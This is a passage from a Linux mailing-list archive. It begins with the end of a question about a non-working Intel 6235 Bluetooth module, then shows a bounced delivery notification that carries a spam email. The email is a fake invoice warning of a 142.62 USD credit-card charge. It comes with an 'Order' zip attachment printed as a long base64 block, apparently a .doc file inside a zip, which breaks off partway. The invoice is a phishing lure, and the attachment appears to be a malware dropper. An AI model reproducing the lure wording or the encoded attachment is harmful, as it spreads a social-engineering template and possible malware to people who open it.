comes up at all in hciconfig dev or rfkill list.

My sense is that the 6235 is a very popular module, and low-cost celeron
motherboards are also pretty popular, so there must be others who have run
into this. Maybe people just don't use bluetooth, or don't expect it to
work on Linux?

Anyhow, here is a gist with the dmesg boot log and lshw output:

https://gist.github.com/mikepurvis/ee7bc8fb85ff7ae64a9d

Looks like there's a crash in there related to intel integrated graphics—
could this be a cause? This is a headless machine, so disabling graphics
completely is on the table, if someone can suggest a good way to go
about that. Any other ideas as to what's going on here?

Thanks muchly.

 --
Mike Purvis | Clearpath Robotics, Inc.
1425 Strasburg Road, Unit 2A , Kitchener, Ontario, N2R 1H2

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2014-11-04 20:01 postmaster-PkbjNfxxIARBDgjK7y7TUQ
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-PkbjNfxxIARBDgjK7y7TUQ @ 2014-11-04 20:01 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 173 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       gtdcastroo-PkbjNfxxIATvnOemgxGiVw@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 347 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 39783 bytes --]

[-- Attachment #1.3.1.1: Type: text/plain, Size: 368 bytes --]


Dear Customer, gtdcastroo-PkbjNfxxIAS8Icyk09nozA@public.gmane.org

This is a notice that the invoice has been generated on 05.11.2014.
Your payment method is: credit card.
The order reference is 4540561.
Your credit card will be charged for 142.62 USD.
The payment and delivery information is in attached file.


Regards,
Systems Company, Holshouser Dorthy

[-- Attachment #1.3.1.2: Type: text/plain, Size: 38389 bytes --]

application/x-zip-compressed;
 name="Order5611041102.zip"
Content-transfer-encoding: base64
Content-Disposition: attachment;
 filename="Order5611041102.zip"

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
